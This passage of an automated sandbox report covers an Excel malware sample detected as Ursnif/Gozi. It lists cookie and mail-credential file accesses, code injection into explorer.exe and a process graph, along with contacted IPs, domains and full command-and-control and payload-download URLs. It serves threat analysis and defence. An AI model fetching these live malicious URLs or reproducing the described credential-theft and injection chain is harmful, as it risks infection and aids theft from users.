Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\AD75170AFD4083DF36F2FB2A0FF4F5F235DAACCC
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\3B67994E37D438004B4E63B8887ABA39CCE10F06
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\CD57E3AA8FBEB529CF301EA04C8677DF47B1E70A
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\90873B6220C4B6986D18F883E40CDFF4130FA25D
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\81891801FEAAB03CA623D8EA33A96214385BBE6D
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\BAD48B4A98F040CB709A10AB911B7F5951B80382
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\275D9A5B16B4554265D09A906CD570CE978CD459
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\CFD0F2ECB0EF30EDABF9D5E0C6E0F881541171CE
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\EB884CABEA8CEEDAE45ACF90C1602D525A0BC4A1
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\E6D66AFFD836C8C13B306AAB42C9C6E3425363B6
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\F155A5045E38F0B6AAA9B23A7B2D1F5C01458986
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\E066368A4F08EB33BD47C7065C0D4D8CEF1EBCEB
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\B610CB95B704256B17422E60EED197A84FFE77AA
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\283625767F66A9BAD90DE654C536F9BA74C66CC0
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\645AC9609952C4386AE4A188AB706FBE5D5A9EEC
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7xwghk55.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.2321839049.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321796165.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321745663.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2455042419.0000000002936000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321730520.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321759010.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2416998966.0000000002890000.00000040.00000001.sdmp, type: MEMORY
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 350432 Sample: xls.xls Startdate: 09/02/2021 Architecture: WINDOWS Score: 100 83 8.8.8.8.in-addr.arpa 2->83 85 1.0.0.127.in-addr.arpa 2->85 107 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->107 109 Found malware configuration 2->109 111 Antivirus detection for URL or domain 2->111 113 18 other signatures 2->113 10 mshta.exe 2->10         started        13 EXCEL.EXE 86 43 2->13         started        17 iexplore.exe 6 36 2->17         started        19 3 other processes 2->19 signatures3 process4 dnsIp5 141 Suspicious powershell command line found 10->141 21 powershell.exe 10->21         started        99 online-docu-sign-st.com 8.208.96.68, 49165, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 13->99 79 C:\fyjh\zglgy\lckhvmn.drhdh, PE32 13->79 dropped 81 C:\Users\user\AppData\Local\...\yytr[1].png, PE32 13->81 dropped 143 Document exploit detected (process start blacklist hit) 13->143 145 Document exploit detected (UrlDownloadToFile) 13->145 25 rundll32.exe 13->25         started        27 iexplore.exe 23 17->27         started        30 iexplore.exe 14 19->30         started        32 iexplore.exe 18 19->32         started        34 iexplore.exe 14 19->34         started        file6 signatures7 process8 dnsIp9 69 C:\Users\user\AppData\Local\...\vl8o3v8u.0.cs, UTF-8 21->69 dropped 71 C:\Users\user\AppData\...\8pjpp9kb.cmdline, UTF-8 21->71 dropped 115 Hijacks the control flow in another process 21->115 117 Injects code into the Windows Explorer (explorer.exe) 21->117 119 Writes to foreign memory regions 21->119 121 4 other signatures 21->121 36 explorer.exe 21->36 injected 41 csc.exe 21->41         started        43 csc.exe 21->43         started        45 rundll32.exe 1 25->45         started        91 assets.onestore.ms 27->91 93 consentdeliveryfd.azurefd.net 27->93 95 ajax.aspnetcdn.com 27->95 97 pronpepsipirpyamvioerd.com 80.208.230.180, 49186, 49187, 49188 RACKRAYUABRakrejusLT Lithuania 32->97 file10 signatures11 process12 dnsIp13 87 eorctconthoelrrpentshfex.com 45.67.231.135, 443 SERVERIUS-ASNL Moldova Republic of 36->87 89 mozilla.cloudflare-dns.com 104.16.249.249, 443, 49194, 49195 CLOUDFLARENETUS United States 36->89 73 C:\Users\user\AppData\Roaming\...\prefs.js, ASCII 36->73 dropped 123 Tries to steal Mail credentials (via file access) 36->123 125 Overwrites Mozilla Firefox settings 36->125 127 Searches for Windows Mail specific files 36->127 139 4 other signatures 36->139 47 cmd.exe 36->47         started        50 cmd.exe 36->50         started        52 cmd.exe 36->52         started        54 cmd.exe 36->54         started        75 C:\Users\user\AppData\Local\...\8pjpp9kb.dll, PE32 41->75 dropped 129 Tries to delay execution (extensive OutputDebugStringW loop) 41->129 56 cvtres.exe 41->56         started        77 C:\Users\user\AppData\Local\...\vl8o3v8u.dll, PE32 43->77 dropped 58 cvtres.exe 43->58         started        131 Detected Gozi e-Banking trojan 45->131 133 Writes to foreign memory regions 45->133 135 Writes registry values via WMI 45->135 137 Contains functionality to detect sleep reduction / modifications 45->137 60 control.exe 45->60         started        file14 signatures15 process16 signatures17 147 Uses nslookup.exe to query domains 47->147 62 nslookup.exe 47->62         started        65 ipconfig.exe 50->65         started        67 rundll32.exe 60->67         started        process18 dnsIp19 101 222.222.67.208.in-addr.arpa 62->101 103 resolver1.opendns.com 62->103 105 myip.opendns.com 62->105
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.16.249.249
unknown United States
13335 CLOUDFLARENETUS false
8.208.96.68
unknown Singapore
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC true
80.208.230.180
unknown Lithuania
62282 RACKRAYUABRakrejusLT false
45.67.231.135
unknown Moldova Republic of
50673 SERVERIUS-ASNL true

Contacted Domains

Name IP Active
pronpepsipirpyamvioerd.com 80.208.230.180 true
mozilla.cloudflare-dns.com 104.16.249.249 true
myip.opendns.com 84.17.52.38 true
eorctconthoelrrpentshfex.com 45.67.231.135 true
resolver1.opendns.com 208.67.222.222 true
online-docu-sign-st.com 8.208.96.68 true
1.0.0.127.in-addr.arpa unknown unknown
assets.onestore.ms unknown unknown
222.222.67.208.in-addr.arpa unknown unknown
8.8.8.8.in-addr.arpa unknown unknown
ajax.aspnetcdn.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://pronpepsipirpyamvioerd.com/manifest/epAdaEbgmyrS0/5cBg2_2F/5r8v5YqebG9_2BzXwQ53Or2/m_2BYyZlMo/Wjgc3SrdyI1oKZciJ/0VZWBVvz9ttQ/e_2BqGDPIqO/VywJMmm_2FxNKs/BOcG3xAwzit4RyHpLyJsr/vwEVLjnqkBMf1zrK/m34BDAlEVdkNvcp/4fnxbyz8Lb2BtkfzoG/Qmy6EiDgS/W_2BAz08nRnapN/NuB.snx true
  • Avira URL Cloud: safe
unknown
http://pronpepsipirpyamvioerd.com/manifest/t9KapG5Lp7Zt_2Fa57QG/GX7C0FfmRVPiI55eGvl/6x2VyI3ttROAIozUzpTtuU/djl44EXt9ama4/XR_2FoMg/DUUaeRp34H0CCf_2FqktcZq/z9PSxtll7Y/oj4uvWMlnUr2X5bcU/HYCHWM70nrfm/_2BgTKf7qxG/3cOw5VQBP7LVAf/95TW5v6vv1PzXG2YnDn_2/B53HOO92/81PS.snx true
  • Avira URL Cloud: safe
unknown
http://online-docu-sign-st.com/yytr.png true
  • Avira URL Cloud: malware
unknown
http://pronpepsipirpyamvioerd.com/manifest/8LuXDq_2BWfBiB/BEj6sfjtywNrZQzF5QZK7/NbbMkjR9SpGW28t6/1m9JUJz0exuG0Ws/6b83q2bcM1KtQpqf51/Z_2B1SUtN/P_2FDTQIaszfL7CFhXYP/tmsBI8pqKk7pm_2BfxZ/6rZJurPMhY6pGTLji_2FEt/IMZgEgmplBU7m/NokZx7zj/OP_2FSvKpKSMcRmuUdUVqR0/teCNe1.snx true
  • Avira URL Cloud: safe
unknown
http://pronpepsipirpyamvioerd.com/favicon.ico true
  • Avira URL Cloud: safe
unknown
0 true
    low